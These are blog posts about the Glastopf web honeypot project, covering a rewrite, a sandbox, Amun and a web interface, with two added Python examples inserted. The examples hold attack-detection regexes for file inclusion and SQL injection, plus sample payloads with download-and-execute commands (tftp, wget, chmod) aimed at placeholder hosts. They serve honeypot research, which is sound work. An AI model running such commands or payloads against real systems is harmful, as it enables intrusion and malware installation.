Glastopf init.d Script
Filed under Glastopf, Honeypot on 24 June 2010
Miguel Cabrerizo has written a Glastopf init script for Debian. Feel free to check it out from our repository. Thank you very much, Miguel!
The Honeynet Project and the Google Open Source Team have decided to accept my application for the Google Summer of Code 2010. During these three months I will work on an instant messenger honeypot. I am very much looking forward to this time and glad to finally be able to turn the many ideas in my head into code.
Besides the actual development, distributing the instant messaging "decoy accounts" will play a central role. Among other things, I am considering using sandbox systems for this.
The Honeynet Project's application for this year's Google Summer of Code has been accepted! The projects proposed by the Honeynet Project can be viewed here. I recommend every interested student to have a look and, if a suitable topic turns up, to get in touch with the mentors or to propose their own ideas.
GSoC offers an excellent opportunity to gain experience in an open source project. This includes working together with people who have a great deal of experience in the field. For the Glastopf project it was an extraordinary push forward, and the contacts made were a great enrichment.
Today I will talk a bit about Glastopf and what's coming up in the next months.
Glastopf:
Last Friday (22.01.) I met Sven. Sven is a bachelor student at the Bern University of Applied Sciences and will write his thesis about Glastopf. During his work he will do a total rewrite; when he is finished, the new version will have at least the same features as the old one. The goals: a much better modular structure, meaning there is one core which directs every request to the modules. The modules store the data, emulate the vulnerability and compose the response which the core returns to the attacker. There will also be a much better classification of incoming attacks, and the rules used for it will be completely detached from the source code so that they can easily be distributed between different sensors. I will post details as soon as we have started the work. This also means that we will freeze the current unstable version to put all effort into the new one.
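To make the "one core, many modules" layout and the detached classification rules concrete, here is an added example sketch (not Glastopf's code, and not Sven's rewrite). The module names, the JSON rule format and the sample requests are assumptions made for illustration; a real sensor would load the rules from a shared file and write events to a database instead of a list.

```python
"""Sketch of the "one core, many modules" honeypot layout described above.

Added example (not Glastopf's code): the module names, the rule format and the
sample requests are assumptions made for illustration."""
import json
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Classification rules kept outside the code, in a format a sensor could load
# from a shared file. This inline JSON string is constructed for the example;
# rules are tried in order and the first match wins.
RULES_JSON = r'''
[
  {"name": "rfi",  "field": "query", "pattern": "(?i)=\\s*(?:https?|ftp)://"},
  {"name": "lfi",  "field": "query", "pattern": "(?:\\.\\./){2,}|/etc/passwd"},
  {"name": "sqli", "field": "query", "pattern": "(?i)(?:union\\s+select|'\\s*or\\s*'?1'?\\s*=\\s*'?1)"}
]
'''


@dataclass
class Request:
    path: str
    query: str
    headers: Dict[str, str] = field(default_factory=dict)


@dataclass
class Event:
    """What a module stores about one handled request (a DB row in a real sensor)."""
    kind: str
    path: str
    detail: str = ""


class RuleClassifier:
    """Classifies a request using rules loaded from data, not from code."""

    def __init__(self, rules_json: str):
        self.rules = [(r["name"], r["field"], re.compile(r["pattern"]))
                      for r in json.loads(rules_json)]

    def classify(self, req: Request) -> str:
        for name, fld, rx in self.rules:
            if rx.search(getattr(req, fld, "")):
                return name
        return "unknown"


class RFIModule:
    """Emulates a remote-file-inclusion hole: records the URL the attacker
    wants included and answers as if the include succeeded, so the bot proceeds."""
    kind = "rfi"

    def handle(self, req: Request, store: List[Event]) -> Tuple[int, str]:
        m = re.search(r"=\s*((?:https?|ftp)://\S+)", req.query, re.I)
        store.append(Event(self.kind, req.path, m.group(1) if m else ""))
        return 200, "<html><body>include ok</body></html>"


class LFIModule:
    """Emulates local-file inclusion by returning a fake /etc/passwd."""
    kind = "lfi"

    def handle(self, req: Request, store: List[Event]) -> Tuple[int, str]:
        store.append(Event(self.kind, req.path, req.query))
        return 200, "root:x:0:0:root:/root:/bin/bash\n"


class SQLiModule:
    """Emulates SQL injection with a MySQL-style error so scanners keep probing."""
    kind = "sqli"

    def handle(self, req: Request, store: List[Event]) -> Tuple[int, str]:
        store.append(Event(self.kind, req.path, req.query))
        return 200, "You have an error in your SQL syntax"


class DefaultModule:
    """Anything the rules do not recognise is still logged and gets a generic page."""
    kind = "unknown"

    def handle(self, req: Request, store: List[Event]) -> Tuple[int, str]:
        store.append(Event(self.kind, req.path, req.query))
        return 404, "<html><body>Not Found</body></html>"


class Core:
    """Routes every request to exactly one module and hands back its response."""

    def __init__(self, classifier: RuleClassifier, modules):
        self.classifier = classifier
        self.modules = {m.kind: m for m in modules}
        self.store: List[Event] = []   # in-memory stand-in for the sensor database

    def dispatch(self, req: Request) -> Tuple[str, int, str]:
        kind = self.classifier.classify(req)
        module = self.modules.get(kind, self.modules["unknown"])
        status, body = module.handle(req, self.store)
        return kind, status, body


def build_core() -> Core:
    return Core(RuleClassifier(RULES_JSON),
                [RFIModule(), LFIModule(), SQLiModule(), DefaultModule()])


if __name__ == "__main__":
    core = build_core()
    for q in ("page=http://203.0.113.5/c99.txt?", "file=../../../../etc/passwd",
              "id=1' or '1'='1", "id=42"):
        print(core.dispatch(Request("/index.php", q)))
```

Because the core only knows module names and the classifier only knows the rule file, a new vulnerability emulation is a new module plus a new rule entry, and an updated rule file can be pushed to every sensor without touching their code. Rule order matters: the RFI rule is checked first because an RFI payload can also contain strings that look like traversal.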
PHP Sandbox:
I'm working on a connection between Glastopf and a PHP sandbox to classify the collected samples. Furthermore, there is the possibility of replying to common requests hitting a Glastopf sensor with the same, perfectly emulated reply obtained from the sandbox. The collected bots have great potential to help us do research on web server botnets. More posts about this topic will follow.
Project:
We are also looking forward to intensifying our cooperation with interested universities and corporations, especially 1and1 and the Bern University of Applied Sciences. We are also officially integrating some people into the project who are already working on different parts of it.
Meeting:
At the end of March we are planning a meeting in Karlsruhe, Germany, for everyone interested in the project. The goal is to push the discussions further, exchange knowledge, get to know each other and of course drink some beer :) . There will also be some short talks on how we take the project forward, and some of us will talk about how they use Glastopf. More information, and in the near future the schedule, can be found in our wiki: GlasCon-3-2010
To move Glastopf support out of the IRC data nirvana, we got a mailing list from the Honeynet Project. You can subscribe via the web interface: Mailman and browse the (so far) glorious archive right here: Pipermail. I'm looking forward to seeing some good discussions ;)
Jan Göbel has written a detailed report on his low-interaction honeypot Amun. The paper describes in detail how Amun works and was written in the hope of giving a deep enough insight to encourage the contribution of vulnerability modules.
English summary:
In this report we describe a low-interaction honeypot, which is capable of capturing autonomous spreading malware from the internet, named Amun. For this purpose, the software emulates a wide range of different vulnerabilities. As soon as an attacker exploits one of the emulated vulnerabilities, the payload transmitted by the attacker is analyzed and any download URL found is extracted. Next, the honeypot tries to download the malicious software and store it on the local hard disk for further analysis. As a result, we are able to collect, in the best case, unknown binaries of malware that automatically spreads across the network. The collected samples can, for example, be used to help anti-virus vendors improve their signatures.
The paper is available as a PDF in the electronic library of the University of Mannheim.
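The step the summary passes over quickly, getting a download location out of the transmitted payload, is where most of the parsing work in such a honeypot sits. The following is an added example in that spirit; it is not Amun's code. The regular expressions, the `tftp -i HOST get FILE` command form and all sample payloads are constructed for illustration, and the actual download is deliberately left out, since fetching attacker-supplied URLs belongs in an isolated, rate-limited component.

```python
"""Pulling download locations out of a captured exploit payload, the step the
Amun summary describes between "exploit" and "download".

Added example (not Amun's code): the regexes and the sample payloads below are
constructed for illustration; fetching the files is deliberately left out."""
import re
from typing import List
from urllib.parse import urlparse

# Direct URLs (http/https/ftp/tftp). Shellcode carries them as plain ASCII,
# usually NUL-terminated, so the character classes stop at control bytes.
URL_RE = re.compile(
    rb"(?i)\b(?:https?|ftp|tftp)://[\w.\-]+(?::\d{1,5})?"
    rb"(?:/[\w.~%/?=&+#:@!$*,;()\[\]-]*)?")

# Windows command-line download via tftp.exe, e.g. "tftp -i HOST get FILE",
# which carries no URL at all but names a host and a file to fetch.
TFTP_CMD_RE = re.compile(
    rb"(?i)\btftp(?:\.exe)?\s+(?:-i\s+)?([\w.\-]+)\s+get\s+([^\s&|;\"']+)")


def plausible(url: str) -> bool:
    """Reject anything urlparse cannot turn into a host plus a sane port."""
    try:
        p = urlparse(url)
        return bool(p.hostname) and (p.port is None or 0 < p.port < 65536)
    except ValueError:          # urlparse raises on ports outside 0..65535
        return False


def extract_download_urls(payload: bytes) -> List[str]:
    """Return every distinct, plausible download location in the raw payload,
    in order of first appearance. Works on bytes so NULs and shellcode
    opcodes around the string do not need to be decoded first."""
    found = []
    for m in URL_RE.finditer(payload):
        found.append(m.group(0).decode("latin-1"))
    for m in TFTP_CMD_RE.finditer(payload):
        host, fname = (g.decode("latin-1") for g in m.groups())
        found.append("tftp://%s/%s" % (host, fname.lstrip("/")))
    out, seen = [], set()
    for u in found:
        if u not in seen and plausible(u):
            seen.add(u)
            out.append(u)
    return out


# Constructed sample payloads (documentation-range IPs, no real malware).
SAMPLE_PAYLOADS = {
    "url_in_shellcode": b"\x90\x90\xeb\x05http://198.51.100.7:8080/bot.exe\x00\xe8\xf6\xff\xff\xff",
    "tftp_cmd": b"cmd /c tftp -i 203.0.113.9 get worm.exe & start worm.exe",
    "quoted_ftp": b"wget 'ftp://198.51.100.20/pub/m.bin' -O /tmp/m; chmod +x /tmp/m",
    "duplicate": b"http://a.example/x.exe http://a.example/x.exe",
    "bad_port": b"http://198.51.100.7:99999/x.exe",
    "nothing": b"GET / HTTP/1.0\r\n\r\n",
}

if __name__ == "__main__":
    for name, payload in SAMPLE_PAYLOADS.items():
        print(name, extract_download_urls(payload))
```

Two points worth keeping when extending this: match on the raw bytes rather than on a decoded string, because a decode error on one stray byte would otherwise lose the whole payload, and treat every extracted location as hostile input for whatever does the fetching (timeouts, size limits, no redirects to internal addresses).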
Since a few days ago, the first release candidate of the Glastopf web interface version 0.0.1 has been available. Information about how to set it up, and the needed files, can be found in our repository. This new web interface allows you to visualize and draw first conclusions from data collected with Glastopf.
Those who are using Glastopf have certainly thought about how to evaluate and further use the collected data. First, there is the SURFids plug-in, which allows you to use the SURFids web interface as a data analysis front end. If you prefer the easy way, send your data to the central database and use its web interface. Last but not least, there is a web interface developed by people from the Glastopf project, but it has been a bit neglected in the last months. Marcel Koßin noticed this and put a lot of effort into a rework. As soon as the first version is finished and the repository works properly we will release more details and the source.
Glastopf has now been publicly available for one year. There have been a lot of changes during this year. Glastopf has been developed in many aspects, and I've found many people (or they found me) who are very interested in the project and are now working together with me. The coming year will bring a lot of changes; among others, there will be an improvement of the attack classification, integration of a PHP sandbox, refinement of the vulnerability emulator and development of the web interface. If nothing goes wrong I'll also be able to write more documentation.
Since the Google Summer of Code 2009 I've been working together with the Honeynet Project, and in retrospect I've benefited a lot from it and met excellent people. The Honeynet Project provides direct access to most of the people who are doing pioneering work in honeypot development and research. Since a few days ago I'm an official member of the Honeynet Chicago Chapter, which gives me the possibility to give my knowledge back to the project.